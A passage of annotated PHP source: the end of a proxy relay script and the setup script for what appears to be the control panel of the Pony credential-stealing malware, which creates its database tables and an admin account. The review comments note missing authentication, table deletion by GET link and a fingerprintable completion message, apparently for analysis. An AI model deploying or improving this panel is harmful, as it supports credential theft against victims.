  2093. {
  2094. $headers_end_pos = strpos($data, "\n\n");
  2095. $data_start_pos = $headers_end_pos+2;
  2096. }
  2097.  
  2098. if ($headers_end_pos !== false)
  2099. {
        // every upstream header line, including the status line, is passed to header()
  2100. $lines = parse_lines(substr($data, 0, $headers_end_pos));
  2101. foreach ($lines as $line)
  2102. {
  2103. // do not pass "Transfer-Encoding: chunked" header
        // the test is a case-insensitive substring match, so any line that contains
        // "Transfer-Encoding" is skipped
  2104. if (stripos($line, 'Transfer-Encoding') === false)
  2105. {
  2106. header($line."\r\n");
  2107. }
  2108. }
  2109.  
        // die() with a string argument prints the body and ends the request
  2110. die(substr($data, $data_start_pos));
  2111. } else
  2112. {
  2113. die($data);
  2114. }
  2115.  
  2116.  
  2117.  
  2118. -----
  2119.  
  2120. <?php
        // Installer: checks the configuration and database connection, then either shows
        // the admin-credentials form, creates the tables plus the first admin account, or
        // reports that installation is already complete.
        // No login or session check appears anywhere in this script; what it does is
        // decided only by whether the tables exist. Lines without a gutter number are
        // review annotations.
  2121.  
  2122. error_reporting(E_ALL);
  2123.  
  2124. // make sure included files do not generate extra output
  2125. ob_start();
  2126.  
        // $proxy_config is never assigned in this script; it is only honoured when a
        // script that includes this file has set it beforehand
  2127. if (!isset($proxy_config))
  2128. {
  2129. // use local config file
  2130. $config_file = "config.php";
  2131. } else
  2132. {
  2133. // use proxy config file
  2134. $config_file = $proxy_config;
  2135. }
  2136.  
  2137. if (!file_exists($config_file))
  2138. {
  2139. echo '<h4><font color="#b72525">Error! Server configuration problem!</font></h4>';
  2140. echo '<div style="border:#ee0000 solid 1px; background-color:#f6adad; color:#000000; width:500px; margin-bottom:20px">';
  2141. echo 'Missing configuration file `<b>'.$config_file.'</b>`.';
  2142. echo '</div>';
  2143. die();
  2144. }
  2145.  
  2146. require_once($config_file);
  2147. require_once("includes/misc.php");
  2148. require_once("includes/password_modules.php");
  2149. require_once("includes/database.php");
  2150.  
  2151. // clean output buffer
  2152. ob_end_clean();
  2153.  
  2154. $pony_db = new pony_db();
  2155.  
        // the error paths below call mysql_error(), which exists only in the legacy
        // ext/mysql API (removed in PHP 7.0), and print its text into the page
  2156. if (!$pony_db->connect($mysql_host, $mysql_user, $mysql_pass))
  2157. {
  2158. echo '<h4><font color="#b72525">Error! Server configuration problem!</font></h4>';
  2159. echo '<div style="border:#ee0000 solid 1px; background-color:#f6adad; color:#000000; width:500px; margin-bottom:20px">';
  2160. echo 'Cannot connect to mysql database, check settings in configuration file `<b>config.php</b>`.<br />';
  2161. echo 'MySQL error: '.mysql_error();
  2162. echo '</div>';
  2163. die();
  2164. }
  2165.  
  2166. if (!$pony_db->select_db($mysql_database))
  2167. {
  2168. echo '<h4><font color="#b72525">Error! Server configuration problem!</font></h4>';
  2169. echo '<div style="border:#ee0000 solid 1px; background-color:#f6adad; color:#000000; width:500px; margin-bottom:20px">';
  2170. echo('Cannot select mysql database, please, check if the `<b>'.$mysql_database.'</b>` database exists or you have enough rights to create new databases.<br />');
  2171. echo 'MySQL error: '.mysql_error().'.';
  2172. echo '</div>';
  2173. die();
  2174. }
  2175.  
        // these two flags drive every branch below
  2176. $all_tables_exist = $pony_db->all_tables_exist();
  2177. $some_tables_exist = $pony_db->some_tables_exist();
  2178.  
  2179. if (!$pony_db->state)
  2180. {
  2181. echo '<h4><font color="#b72525">Error! Server configuration problem!</font></h4>';
  2182. echo '<div style="border:#ee0000 solid 1px; background-color:#f6adad; color:#000000; width:500px; margin-bottom:20px">';
  2183. echo 'Unknown MySQL error occured: '.mysql_error().'.';
  2184. echo '</div>';
  2185. die();
  2186. }
  2187.  
        // install_check() is defined outside this section; it is called once to test and,
        // on failure, a second time with a different first argument inside the warning box.
        // NOTE(review): presumably the first argument switches on printed output — confirm.
  2188. if (!install_check(false, true))
  2189. {
  2190. echo '<h4><font color="#b72525">Attention! Server configuration problem!</font></h4>';
  2191. echo '<div style="border:#ee0000 solid 1px; background-color:#f6adad; color:#000000; width:500px; margin-bottom:20px">';
  2192. install_check(true, true);
  2193. echo '</div>';
  2194. }
  2195.  
        // assign() is defined outside this section; the values are read from $_REQUEST,
        // so GET, POST and cookie input are all accepted
  2196. $set_admin_pass = trim(assign($_REQUEST['set_admin_pass'])) == '1';
  2197.  
        // first-run path: reachable only while at least one table is missing
  2198. if (!$all_tables_exist && $set_admin_pass)
  2199. {
  2200. $admin_login = trim(assign($_REQUEST['login']));
  2201. $admin_pass = trim(assign($_REQUEST['password']));
  2202. $admin_pass_verify = trim(assign($_REQUEST['confirm_password']));
  2203.  
        // the two messages below read "now allowed", apparently meaning "not allowed";
        // the truthiness tests also reject the string '0' as empty
  2204. if (!$admin_login)
  2205. {
  2206. die("Empty login names are now allowed!<br /><a href=\"".$_SERVER['SCRIPT_NAME']."\">Go back and try again</a>.");
  2207. }
  2208.  
  2209. if (!$admin_pass)
  2210. {
  2211. die("Empty passwords are now allowed!<br /><a href=\"".$_SERVER['SCRIPT_NAME']."\">Go back and try again</a>.");
  2212. }
  2213.  
  2214. if ($admin_pass != $admin_pass_verify)
  2215. {
  2216. die("Admin and confirm passwords mismatch!<br /><a href=\"".$_SERVER['SCRIPT_NAME']."\">Go back and try again</a>.");
  2217. }
  2218.  
        // the account is created with the 'admin_all' privilege string; the link to the
        // panel is derived by replacing "setup" with "admin" in the script path
  2219. if ($pony_db->create_tables() && $pony_db->add_user($admin_login, $admin_pass, 'admin_all'))
  2220. {
  2221. echo "Installation complete!<br />";
  2222. echo "<a href=\"".htmlspecialchars(str_replace("setup", "admin", $_SERVER['SCRIPT_NAME']), ENT_QUOTES, 'cp1251')."\">Proceed to administration panel</a>.";
  2223. } else
  2224. {
  2225. die("Installation failed: `<b>".mysql_error()."</b>`");
  2226. }
  2227. die();
  2228. }
  2229.  
  2230. if (!$all_tables_exist)
  2231. {
        // the closing parenthesis of trim() is placed after the comparison, so trim() is
        // applied to the boolean result; the condition still evaluates as intended.
        // delete_tables is offered as a plain GET link further down.
  2232. if ($some_tables_exist && trim(assign($_REQUEST['delete_tables']) == '1'))
  2233. {
  2234. $pony_db->delete_tables();
  2235. $some_tables_exist = $pony_db->some_tables_exist();
  2236. }
  2237.  
  2238. if ($some_tables_exist)
  2239. {
  2240. echo '<h4><font color="#b72525">Error! Server configuration problem!</font></h4>';
  2241. echo '<div style="border:#ee0000 solid 1px; background-color:#f6adad; color:#000000; width:500px; margin-bottom:20px">';
  2242. echo 'Missing required MySQL tables. Please, delete Pony MySQL tables and try again.<br />';
  2243. echo '</div>';
  2244. echo '<a href="'.$_SERVER['SCRIPT_NAME'].'?delete_tables=1">Delete Pony MySQL tables and restart installation process</a>.';
  2245. die();
  2246. }
  2247.  
        // no tables exist: print the credentials form, which posts back to this script
        // with set_admin_pass=1
  2248. die ("MySQL database installation. Please, provide administrator credentials:<table>".
  2249. "<form action=\"".$_SERVER['SCRIPT_NAME']."\" method=\"post\">".
  2250. "<input type=\"hidden\" name=\"set_admin_pass\" value=\"1\">".
  2251. "<tr><td>Admin login: </td><td><input type=\"text\" name=\"login\"></td></tr>".
  2252. "<tr><td>Admin password: </td><td><input type=\"password\" name=\"password\"></td></tr>".
  2253. "<tr><td>Confirm password: </td><td><input type=\"password\" name=\"confirm_password\"></td></tr><br />".
  2254. "<tr><td colspan=2 align=right><input type=\"submit\" value=\"Install\"></td></tr>".
  2255. "</form>".
  2256. "</table>");
  2257. } else
  2258. {
        // all tables exist: the script only prints a completion notice; this fixed text is
        // what a fully installed panel returns for its setup script
  2259. die('Installation complete!<br />'.
  2260. "<a href=\"".htmlspecialchars(str_replace("setup", "admin", $_SERVER['SCRIPT_NAME']), ENT_QUOTES, 'cp1251')."\">Proceed to administration panel</a>.".
  2261. '<br /><br />To restart installation process, please, delete MySQL tables.<br />'
  2262. );
  2263.  
  2264. }